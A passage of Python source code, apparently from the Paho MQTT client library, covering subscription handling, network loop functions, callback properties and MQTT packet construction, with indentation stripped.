Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id. Must be unicode
[MQTT-3.1.3-11].
Set to None to reset client back to not using username/password for broker authentication.
password: The password to authenticate with. Optional, set to None if not required. If it is unicode, then it
will be encoded as UTF-8.
"""
# [MQTT-3.1.3-11] User name must be UTF-8 encoded string
self._username = None if username is None else username.encode('utf-8')
self._password = password
if isinstance(self._password, unicode):
self._password = self._password.encode('utf-8')
def enable_bridge_mode(self):
"""Sets the client in a bridge mode instead of client mode.
Must be called before connect() to have any effect.
Requires brokers that support bridge mode.
Under bridge mode, the broker will identify the client as a bridge and
not send it's own messages back to it. Hence a subsciption of # is
possible without message loops. This feature also correctly propagates
the retain flag on the messages.
Currently Mosquitto and RSMB support this feature. This feature can
be used to create a bridge between multiple broker.
"""
self._client_mode = MQTT_BRIDGE
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state = mqtt_cs_disconnecting
if self._sock is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIPTION
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, tuple):
topic, qos = topic
if isinstance(topic, basestring):
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, list):
topic_qos_list = []
for t, q in topic:
if q < 0 or q > 2:
raise ValueError('Invalid QoS level.')
if t is None or len(t) == 0 or not isinstance(t, basestring):
raise ValueError('Invalid topic.')
topic_qos_list.append((t.encode('utf-8'), q))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if any(self._filter_wildcard_len_check(topic) != MQTT_ERR_SUCCESS for topic, _ in topic_qos_list):
raise ValueError('Invalid subscription filter.')
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, basestring):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, basestring):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for _ in range(0, max_packets):
if self._sock is None:
return MQTT_ERR_NO_CONN
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process write network events. Use in place of calling loop() if you
wish to handle your client writes as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
try:
for _ in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
finally:
if self.want_write():
self._call_socket_register_write()
else:
self._call_socket_unregister_write()
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
now = time_func()
self._check_keepalive()
if self._last_retry_check + 1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of messages in the outgoing message queue.
0 means unlimited."""
if queue_size < 0:
raise ValueError('Invalid queue size.')
if not isinstance(queue_size, int):
raise ValueError('Invalid type of queue size.')
self._max_queued_messages = queue_size
return self
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, unicode):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
self._will_payload = payload
elif isinstance(payload, (int, float)):
self._will_payload = str(payload).encode('ascii')
elif payload is None:
self._will_payload = b""
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = b""
self._will_payload = b""
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._thread_terminate is True:
break
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except (socket.error, OSError, WebsocketConnectionError):
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._reconnect_wait()
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
def should_exit():
return self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True
if should_exit():
run = False
else:
self._reconnect_wait()
if should_exit():
run = False
else:
try:
self.reconnect()
except (socket.error, WebsocketConnectionError):
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
if threading.current_thread() != self._thread:
self._thread.join()
self._thread = None
@property
def on_log(self):
"""If implemented, called when the client has log information.
Defined to allow debugging."""
return self._on_log
@on_log.setter
def on_log(self, func):
""" Define the logging callback implementation.
Expected signature is:
log_callback(client, userdata, level, buf)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
level: gives the severity of the message and will be one of
MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG.
buf: the message itself
"""
self._on_log = func
@property
def on_connect(self):
"""If implemented, called when the broker responds to our connection
request."""
return self._on_connect
@on_connect.setter
def on_connect(self, func):
""" Define the connect callback implementation.
Expected signature is:
connect_callback(client, userdata, flags, rc)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
flags: response flags sent by the broker
rc: the connection result
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc indicates success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
"""
with self._callback_mutex:
self._on_connect = func
@property
def on_subscribe(self):
"""If implemented, called when the broker responds to a subscribe
request."""
return self._on_subscribe
@on_subscribe.setter
def on_subscribe(self, func):
""" Define the suscribe callback implementation.
Expected signature is:
subscribe_callback(client, userdata, mid, granted_qos)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
subscribe() call.
granted_qos: list of integers that give the QoS level the broker has
granted for each of the different subscription requests.
"""
with self._callback_mutex:
self._on_subscribe = func
@property
def on_message(self):
"""If implemented, called when a message has been received on a topic
that the client subscribes to.
This callback will be called for every message received. Use
message_callback_add() to define multiple callbacks that will be called
for specific topic filters."""
return self._on_message
@on_message.setter
def on_message(self, func):
""" Define the message received callback implementation.
Expected signature is:
on_message_callback(client, userdata, message)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
message: an instance of MQTTMessage.
This is a class with members topic, payload, qos, retain.
"""
with self._callback_mutex:
self._on_message = func
@property
def on_publish(self):
"""If implemented, called when a message that was to be sent using the
publish() call has completed transmission to the broker.
For messages with QoS levels 1 and 2, this means that the appropriate
handshakes have completed. For QoS 0, this simply means that the message
has left the client.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent."""
return self._on_publish
@on_publish.setter
def on_publish(self, func):
""" Define the published message callback implementation.
Expected signature is:
on_publish_callback(client, userdata, mid)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
publish() call, to allow outgoing messages to be tracked.
"""
with self._callback_mutex:
self._on_publish = func
@property
def on_unsubscribe(self):
"""If implemented, called when the broker responds to an unsubscribe
request."""
return self._on_unsubscribe
@on_unsubscribe.setter
def on_unsubscribe(self, func):
""" Define the unsubscribe callback implementation.
Expected signature is:
unsubscribe_callback(client, userdata, mid)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
unsubscribe() call.
"""
with self._callback_mutex:
self._on_unsubscribe = func
@property
def on_disconnect(self):
"""If implemented, called when the client disconnects from the broker.
"""
return self._on_disconnect
@on_disconnect.setter
def on_disconnect(self, func):
""" Define the disconnect callback implementation.
Expected signature is:
disconnect_callback(client, userdata, rc)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
rc: the disconnection result
The rc parameter indicates the disconnection state. If
MQTT_ERR_SUCCESS (0), the callback was called in response to
a disconnect() call. If any other value the disconnection
was unexpected, such as might be caused by a network error.
"""
with self._callback_mutex:
self._on_disconnect = func
@property
def on_socket_open(self):
"""If implemented, called just after the socket was opend."""
return self._on_socket_open
@on_socket_open.setter
def on_socket_open(self, func):
"""Define the socket_open callback implementation.
This should be used to register the socket to an external event loop for reading.
Expected signature is:
socket_open_callback(client, userdata, socket)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which was just opened.
"""
with self._callback_mutex:
self._on_socket_open = func
def _call_socket_open(self):
"""Call the socket_open callback with the just-opened socket"""
with self._callback_mutex:
if self.on_socket_open:
with self._in_callback_mutex:
try:
self.on_socket_open(self, self._userdata, self._sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_open: %s', err)
@property
def on_socket_close(self):
"""If implemented, called just before the socket is closed."""
return self._on_socket_close
@on_socket_close.setter
def on_socket_close(self, func):
"""Define the socket_close callback implementation.
This should be used to unregister the socket from an external event loop for reading.
Expected signature is:
socket_close_callback(client, userdata, socket)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which is about to be closed.
"""
with self._callback_mutex:
self._on_socket_close = func
def _call_socket_close(self, sock):
"""Call the socket_close callback with the about-to-be-closed socket"""
with self._callback_mutex:
if self.on_socket_close:
with self._in_callback_mutex:
try:
self.on_socket_close(self, self._userdata, sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_close: %s', err)
@property
def on_socket_register_write(self):
"""If implemented, called when the socket needs writing but can't."""
return self._on_socket_register_write
@on_socket_register_write.setter
def on_socket_register_write(self, func):
"""Define the socket_register_write callback implementation.
This should be used to register the socket with an external event loop for writing.
Expected signature is:
socket_register_write_callback(client, userdata, socket)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which should be registered for writing
"""
with self._callback_mutex:
self._on_socket_register_write = func
def _call_socket_register_write(self):
"""Call the socket_register_write callback with the unwritable socket"""
if not self._sock or self._registered_write:
return
self._registered_write = True
with self._callback_mutex:
if self.on_socket_register_write:
try:
self.on_socket_register_write(self, self._userdata, self._sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_register_write: %s', err)
@property
def on_socket_unregister_write(self):
"""If implemented, called when the socket doesn't need writing anymore."""
return self._on_socket_unregister_write
@on_socket_unregister_write.setter
def on_socket_unregister_write(self, func):
"""Define the socket_unregister_write callback implementation.
This should be used to unregister the socket from an external event loop for writing.
Expected signature is:
socket_unregister_write_callback(client, userdata, socket)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
sock: the socket which should be unregistered for writing
"""
with self._callback_mutex:
self._on_socket_unregister_write = func
def _call_socket_unregister_write(self, sock=None):
"""Call the socket_unregister_write callback with the writable socket"""
sock = sock or self._sock
if not sock or not self._registered_write:
return
self._registered_write = False
with self._callback_mutex:
if self.on_socket_unregister_write:
try:
self.on_socket_unregister_write(self, self._userdata, sock)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_socket_unregister_write: %s', err)
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
with self._callback_mutex:
self._on_message_filtered[sub] = callback
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
with self._callback_mutex:
try:
del self._on_message_filtered[sub]
except KeyError: # no such subscription
pass
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it is may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
command = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(command) == 0:
return 1
command, = struct.unpack("!B", command)
self._in_packet['command'] = command
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
byte = self._sock_recv(1)
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(byte) == 0:
return 1
byte, = struct.unpack("!B", byte)
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] += (byte & 127) * self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
data = self._sock_recv(self._in_packet['to_process'])
except WouldBlockError:
return MQTT_ERR_AGAIN
except socket.error as err:
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
else:
if len(data) == 0:
return 1
self._in_packet['to_process'] -= len(data)
self._in_packet['packet'] += data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = {
'command': 0,
'have_remaining': 0,
'remaining_count': [],
'remaining_mult': 1,
'remaining_length': 0,
'packet': b"",
'to_process': 0,
'pos': 0}
with self._msgtime_mutex:
self._last_msg_in = time_func()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
write_length = self._sock_send(packet['packet'][packet['pos']:])
except (AttributeError, ValueError):
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except WouldBlockError:
self._current_out_packet_mutex.release()
return MQTT_ERR_AGAIN
except socket.error as err:
self._current_out_packet_mutex.release()
self._easy_log(MQTT_LOG_ERR, 'failed to receive on socket: %s', err)
return 1
if write_length > 0:
packet['to_process'] -= write_length
packet['pos'] += write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
with self._callback_mutex:
if self.on_publish:
with self._in_callback_mutex:
try:
self.on_publish(self, self._userdata, packet['mid'])
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_publish: %s', err)
packet['info']._set_as_published()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, 0)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
self._sock_close()
return MQTT_ERR_SUCCESS
with self._out_packet_mutex:
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
else:
self._current_out_packet = None
else:
break
self._current_out_packet_mutex.release()
with self._msgtime_mutex:
self._last_msg_out = time_func()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, fmt, *args):
if self.on_log is not None:
buf = fmt % args
try:
self.on_log(self, self._userdata, level, buf)
except Exception:
# Can't _easy_log this, as we'll recurse until we break
pass # self._logger will pick this up, so we're fine
if self._logger is not None:
level_std = LOGGING_LEVEL[level]
self._logger.log(level_std, fmt, *args)
def _check_keepalive(self):
if self._keepalive == 0:
return MQTT_ERR_SUCCESS
now = time_func()
with self._msgtime_mutex:
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
if self._sock is not None and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
with self._msgtime_mutex:
self._last_msg_out = now
self._last_msg_in = now
else:
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
def _mid_generate(self):
with self._mid_generate_mutex:
self._last_mid += 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
@staticmethod
def _topic_wildcard_len_check(topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if b'+' in topic or b'#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
@staticmethod
def _filter_wildcard_len_check(sub):
if (len(sub) == 0 or len(sub) > 65535
or any(b'+' in p or b'#' in p for p in sub.split(b'/') if len(p) > 1)
or b'#/' in sub):
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time_func()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: %d)", mid)
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: %d)", mid)
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte |= 0x80
remaining_bytes.append(byte)
packet.append(byte)
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if isinstance(data, unicode):
data = data.encode('utf-8')
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
def _send_publish(self, mid, topic, payload=b'', qos=0, retain=False, dup=False, info=None):
# we assume that topic and payload are already properly encoded
assert not isinstance(topic, unicode) and not isinstance(payload, unicode) and payload is not None
if self._sock is None:
return MQTT_ERR_NO_CONN
command = PUBLISH | ((dup & 0x1) << 3) | (qos << 1) | retain
packet = bytearray()
packet.append(command)
payloadlen = len(payload)
remaining_length = 2 + len(topic) + payloadlen
if payloadlen == 0:
self._easy_log(
MQTT_LOG_DEBUG,
"Sending PUBLISH (d%d, q%d, r%d, m%d), '%s' (NULL payload)",
dup, qos, retain, mid, topic
)
else:
self._easy_log(
MQTT_LOG_DEBUG,
"Sending PUBLISH (d%d, q%d, r%d, m%d), '%s', ... (%d bytes)",
dup, qos, retain, mid, topic, payloadlen
)
if qos > 0:
# For message id
remaining_length += 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
packet.extend(payload)
return self._packet_queue(PUBLISH, packet, mid, qos, info)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: %d)", mid)
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: %d)", mid)
return self._send_command_with_mid(PUBREL | 2, mid, False)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command |= 0x8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
proto_ver = self._protocol
protocol = b"MQTT" if proto_ver >= MQTTv311 else b"MQIsdp" # hard-coded UTF-8 encoded string
remaining_length = 2 + len(protocol) + 1 + 1 + 2 + 2 + len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags |= 0x02
if self._will:
remaining_length += 2 + len(self._will_topic) + 2 + len(self._will_payload)
connect_flags |= 0x04 | ((self._will_qos & 0x03) << 3) | ((self._will_retain & 0x01) << 5)
if self._username is not None:
remaining_length += 2 + len(self._username)
connect_flags |= 0x80
if self._password is not None:
connect_flags |= 0x40
remaining_length += 2 + len(self._password)
command = CONNECT
packet = bytearray()
packet.append(command)
# as per the mosquitto broker, if the MSB of this version is set
# to 1, then it treats the connection as a bridge
if self._client_mode == MQTT_BRIDGE:
proto_ver |= 0x80
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H" + str(len(protocol)) + "sBBH", len(protocol), protocol, proto_ver, connect_flags,
keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
self._pack_str16(packet, self._will_payload)
if self._username is not None:
self._pack_str16(packet, self._username)
if self._password is not None:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
self._easy_log(
MQTT_LOG_DEBUG,
"Sending CONNECT (u%d, p%d, wr%d, wq%d, wf%d, c%d, k%d) client_id=%s",
(connect_flags & 0x80) >> 7,
(connect_flags & 0x40) >> 6,
(connect_flags & 0x20) >> 5,
(connect_flags & 0x18) >> 3,
(connect_flags & 0x4) >> 2,
(connect_flags & 0x2) >> 1,
keepalive,
self._client_id
)
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending DISCONNECT")
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t, _ in topics:
remaining_length += 2 + len(t) + 1
command = SUBSCRIBE | (dup << 3) | 0x2
packet = bytearray()
packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t, q in topics:
self._pack_str16(packet, t)
packet.append(q)
self._easy_log(
MQTT_LOG_DEBUG,
"Sending SUBSCRIBE (d%d, m%d) %s",
dup,
local_mid,
topics,
)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length += 2 + len(t)
command = UNSUBSCRIBE | (dup << 3) | 0x2
packet = bytearray()
packet.append(command)
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
# topics_repr = ", ".join("'"+topic.decode('utf8')+"'" for topic in topics)
self._easy_log(
MQTT_LOG_DEBUG,
"Sending UNSUBSCRIBE (d%d, m%d) %s",
dup,
local_mid,
topics,
)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
with mutex:
now = time_func()
for m in messages.values():
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
